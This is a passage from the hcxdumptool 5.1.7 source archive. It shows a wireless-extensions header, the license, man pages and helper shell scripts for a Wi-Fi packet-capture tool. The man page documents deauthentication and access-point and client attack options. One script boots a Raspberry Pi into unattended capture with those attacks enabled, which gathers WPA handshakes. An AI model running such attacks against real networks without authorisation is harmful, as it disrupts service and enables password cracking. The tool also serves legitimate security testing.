SIOCGIWFREQ 0x8b05 #define SIOCSIWMODE 0x8b06 #define SIOCGIWMODE 0x8b07 #define SIOCGIWTXPOW 0x8b27 #define IW_TXPOW_DBM 0x00 #define IW_FREQ_FIXED 0x01 #define IW_MODE_AUTO 0 #define IW_MODE_ADHOC 1 #define IW_MODE_INFRA 2 #define IW_MODE_MASTER 3 #define IW_MODE_REPEAT 4 #define IW_MODE_SECOND 5 #define IW_MODE_MONITOR 6 #define IW_MODE_MESH 7 struct iw_quality { unsigned char qual; unsigned char level; unsigned char noise; unsigned char updated; }; struct iw_param { int value; unsigned char fixed; unsigned char disabled; unsigned short flags; }; struct iw_point { void *pointer; unsigned short length; unsigned short flags; }; struct iw_freq { int m; short e; unsigned char i; unsigned char flags; }; union iwreq_data { char name[IFNAMSIZ]; struct iw_point essid; struct iw_param nwid; struct iw_freq freq; struct iw_param sens; struct iw_param bitrate; struct iw_param txpower; struct iw_param rts; struct iw_param frag; unsigned mode; struct iw_param retry; struct iw_point encoding; struct iw_param power; struct iw_quality qual; struct sockaddr ap_addr; struct sockaddr addr; struct iw_param param; struct iw_point data; }; struct iwreq { union { char ifrn_name[IFNAMSIZ]; } ifr_ifrn; union iwreq_data u; }; #endif hcxdumptool-5.1.7/jni/000077500000000000000000000000001350370021700146505ustar00rootroot00000000000000hcxdumptool-5.1.7/jni/Application.mk000066400000000000000000000000731350370021700174440ustar00rootroot00000000000000APP_PLATFORM := android-21 APP_BUILD_SCRIPT := Android.mk hcxdumptool-5.1.7/license.txt000066400000000000000000000020711350370021700162530ustar00rootroot00000000000000The MIT License (MIT) Copyright (c) 2000-2019 ZeroBeat Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. hcxdumptool-5.1.7/manpages/000077500000000000000000000000001350370021700156635ustar00rootroot00000000000000hcxdumptool-5.1.7/manpages/hcxdumptool.1000066400000000000000000000062551350370021700203230ustar00rootroot00000000000000.TH HCXDUMPTOOL "1" .SH NAME hcxdumptool - capture packets from wifi devices .SH SYNOPSIS .B hcxdumptool .SH DESCRIPTION .BI hcxdumptool is a tool to capture packets from wifi devices and store the information in pcapng format. .SH AUTHOR This manual page was written by Mike (ZeroBeat). Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so. License MIT .SH OPTIONS .TP .B Common options: .TP .I -i interface (monitor mode will be enabled by hcxdumptool) .TP .I -o output management frames and EAP/EAPOL frames in pcapng format including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) .TP .B Other options: .TP .I -O output unencrypted IPv4 and IPv6 frames in pcapng format including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) .TP .I -W output encrypted WEP frames in pcapng format including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) .TP .I -c set scan list channels (1,2,3,...) .TP .I -t stay time on channel before hopping to the next channel .TP .I -T set maximum ERROR count (hcxdumptool terminates when the value is reached) .TP .I -E EAPOL timeout .TP .I -D deauthentication interval .TP .I -A ap attack interval .TP .I --filterlist= mac filter list .TP .I --filtermode= mode for filter list .TP .I --silent do not transmit packets .TP .I --disable_active_scan do not transmit proberequests to BROADCAST using a BROADCAST ESSID .TP .I --disable_deauthentications disable transmitting deauthentications .TP .I --give_up_deauthentications= .TP .I --disable_disassociations disable transmitting disassociations .TP .I --disable_ap_attacks disable attacks on single access points .TP .I --give_up_ap_attacks= disable transmitting directed proberequests after n tries .TP .I --disable_client_attacks disable attacks on single clients .TP .I --do_rcascan show radio channel assignment (scan for target access points) .TP .I --ap_mac= use this MAC address for access point as start MAC .TP .I --station_mac= use this MAC address for station .TP .I --station_vendor= use this VENDOR information for station .TP .I --use_gpsd use GPSD to retrieve position .TP .I --save_rcascan= output rca scan list to file when hcxdumptool terminated .TP .I --save_rcascan_raw= output file in pcapng format .TP .I --enable_status= enable status messages .TP .I --gpio_button= Raspberry Pi GPIO pin number of button (2...27) .TP .I --gpio_statusled= Raspberry Pi GPIO number of status LED (2...27) .TP .I --poweroff once hcxdumptool terminated, power off system .TP .I --ignore_warning hcxdumptool will not terminate if other services take access on the device .TP .I -I show wlan interfaces .TP .I -C show available channels and quit .TP .I -h or --help show help screen .TP .I -v or --version show version .TP hcxdumptool-5.1.7/manpages/hcxpioff.1000066400000000000000000000016661350370021700175640ustar00rootroot00000000000000.TH HCXPIOFF "1" .SH NAME hcxpioff - control Raspberry Pi via GPIO .SH SYNOPSIS .B hcxpioff .SH DESCRIPTION .BI hcxdumptool is a tool to control Raspberry Pi via GPIO (hardware modification required). .SH AUTHOR This manual page was written by Mike (ZeroBeat). Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so. License MIT .SH OPTIONS .TP .B Common options: .TP .I --gpio_button= Raspberry Pi GPIO pin number of button (2...27) .TP .I --gpio_statusled= Raspberry Pi GPIO number of status LED (2...27) .I -h or --help show help screen .TP .I -v or --version show version .TP hcxdumptool-5.1.7/usefulscripts/000077500000000000000000000000001350370021700170035ustar00rootroot00000000000000hcxdumptool-5.1.7/usefulscripts/bash_profile000077500000000000000000000013231350370021700213650ustar00rootroot00000000000000#!/bin/bash cd /home export WLANDEV=`ls -1 /sys/class/net | grep ^wl` if [[ ! -z $WLANDEV ]] then ARCHIVNAME=`date +'%Y%m%d%H%M'` ip link set $WLANDEV down iw dev $WLANDEV set type monitor ip link set $WLANDEV up hcxdumptool --gpio_button=4 --gpio_statusled=17 -i $WLANDEV -o $ARCHIVNAME.pcapng --poweroff --filterlist=blacklistown --filtermode=1 --give_up_ap_attacks=100000 --give_up_deauthentications=100000 # hcxdumptool --gpio_button=4 --gpio_statusled=17 -i $WLANDEV -o $ARCHIVNAME.pcapng --poweroff --filterlist=blacklistown --filtermode=1 --disable_ap_attacks --disable_deauthentications -t 120 fi hcxpioff --gpio_button=4 --gpio_statusled=17 & systemctl start dhcpcd@eth0.service systemctl start sshd.service hcxdumptool-5.1.7/usefulscripts/killmonnb000077500000000000000000000010171350370021700207150ustar00rootroot00000000000000#!/bin/sh if test -z "$1" then for IFACE in `ls -1 /sys/class/net | grep ^wl` do printf "$IFACE " cat /sys/class/net/$IFACE/address done printf "\nelect WLAN interface: " read WLANDEV else WLANDEV=$1 fi echo "deactivating monitor mode on $WLANDEV" sudo ip link set $WLANDEV down sudo iw dev $WLANDEV set type managed sudo ip link set $WLANDEV up sudo iw dev $WLANDEV info echo "activating NetworkManager and wpa_supplicant" sudo systemctl start NetworkManager.service sudo systemctl start wpa_supplicant.service hcxdumptool-5.1.7/usefulscripts/makemonnb000077500000000000000000000010161350370021700206760ustar00rootroot00000000000000#!/bin/sh if test -z "$1" then for IFACE in `ls -1 /sys/class/net | grep ^wl` do printf "$IFACE " cat /sys/class/net/$IFACE/address done printf "\nselect WLAN interface: " read WLANDEV else WLANDEV=$1 fi echo "deactivating NetworkManager and wpa_supplicant" sudo systemctl stop NetworkManager.service sudo systemctl stop wpa_supplicant.service echo "activating monitor mode on $WLANDEV" sudo ip link set $WLANDEV down sudo iw dev $WLANDEV set type monitor sudo ip link set $WLANDEV up sudo iw dev $WLANDEV info hcxdumptool-5.1.7/usefulscripts/pireadcard000077500000000000000000000011251350370021700210260ustar00rootroot00000000000000#!/bin/bash lsblk printf "\nchoose device: " read DEVICE sudo fsck /dev/"$DEVICE"1 sudo fsck /dev/"$DEVICE"2 if [ -f "rpiboot.tgz" ] then rm -f rpiboot.tgz fi if [ -f "rpiroot.tgz" ] then rm -f rpiroot.tgz fi echo "mount boot" if [ ! -d "boot" ] then mkdir boot fi sudo mount /dev/"$DEVICE"1 boot cd boot sudo tar -zcvf ../rpiboot.tgz . sync cd .. echo "mount root" if [ ! -d "root" ] then mkdir root fi sudo mount /dev/"$DEVICE"2 root cd root sudo tar --exclude=var/log --exclude=lost+found -zcvpf ../rpiroot.tgz . sync cd .. sudo umount boot sudo umount root rm -r boot rm -r root hcxdumptool-5.1.7/usefulscripts/piwritecard000077500000000000000000000011651350370021700212510ustar00rootroot00000000000000#!/bin/bash lsblk printf "\nchoose device: " read DEVICE printf "\033[0;31m o p n p 1 +100M t c n p 2 w \033[1;0m\n" sudo fdisk /dev/$DEVICE echo "erstelle Filesystem boot" sudo mkfs.fat -F32 /dev/"$DEVICE"1 echo "erstelle Filesystem root" sudo mkfs.ext4 /dev/"$DEVICE"2 echo "mount boot" if [ ! -d "boot" ] then mkdir boot fi sudo mount /dev/"$DEVICE"1 boot cd boot sudo tar -zxvf ../rpiboot.tgz sync cd .. echo "mount root" if [ ! -d "root" ] then mkdir root fi sudo mount /dev/"$DEVICE"2 root cd root sudo tar -zxvf ../rpiroot.tgz sync cd .. sudo umount boot sudo umount root rm -r boot rm -r root